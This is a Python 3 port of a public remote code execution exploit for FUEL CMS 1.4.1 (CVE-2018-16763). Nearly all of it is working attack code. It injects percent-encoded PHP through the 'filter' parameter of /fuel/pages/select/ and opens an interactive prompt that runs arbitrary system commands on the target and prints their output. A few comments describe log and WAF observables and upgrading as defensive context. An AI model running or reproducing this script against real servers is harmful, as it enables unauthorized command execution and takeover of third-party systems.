#!/bin/env python3
#
# fuelCMS 1.4.1 - Remote Code Execution
#
# Port Author: n3m1.sys
# Original exploit by 0xd0ff9: https://www.exploit-db.com/exploits/47138
#
# This is a port to Python 3 of the original exploit, as Python 2 is now deprecated.
#
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
import urllib
import urllib.parse

import requests
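# Base URL (scheme://host:port) of the FUEL CMS instance being assessed. The
# value below is a placeholder and must be replaced before any request is sent.
url = "http://x.x.x.x:port" # Change this to the target URL
# Requests are routed through this proxy (the example is a local Burp listener).
# Only the "http" scheme is mapped, so an https:// target would not be proxied.
proxy = {"http" : "http://127.0.0.1:8080"} # Proxies you are behind (example is a burp url)

# Interactive loop: each line typed at the prompt is percent-encoded and placed
# inside the `filter` query parameter of /fuel/pages/select/.
#
# Defender's view: the observable for CVE-2018-16763 is a GET to
# /fuel/pages/select/ whose `filter` parameter contains percent-encoded quotes
# and PHP function-call syntax. Web-server access logs and WAF rules can key on
# that path-and-parameter pair. The affected range stated in this file's header
# is "<= 1.4.1", so remediation is moving to a later release.
while True:
    try:
        command = input("$: ")
    except (EOFError, KeyboardInterrupt):
        # End the session cleanly on Ctrl-D / Ctrl-C instead of a traceback.
        print()
        break

    # The fixed prefix/suffix are percent-encoded PHP that the vulnerable
    # endpoint evaluates; quote() keeps the typed command from breaking the URL.
    exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.parse.quote(command)+"%27%29%2b%27"

    try:
        # A timeout keeps an unresponsive host or proxy from hanging the loop.
        r = requests.get(exploit_url, proxies=proxy, timeout=10)
    except requests.RequestException as exc:
        print("[-] Request failed: {}".format(exc))
        continue

    # The payload prints the literal word "system" before the command output,
    # and the page's first "<div " follows it; the text between is the result.
    start = r.text.find("system")
    if start == -1:
        # No marker means the injected code did not run (patched or not FUEL
        # CMS); slicing with find() == -1 would print unrelated page text.
        print("[-] Marker not found in response (HTTP {})".format(r.status_code))
        continue
    end = r.text.find("<div ")
    if end == -1:
        # Without the closing delimiter, show everything after the marker
        # rather than silently dropping the final character.
        end = len(r.text)
    print(r.text[start+6:end])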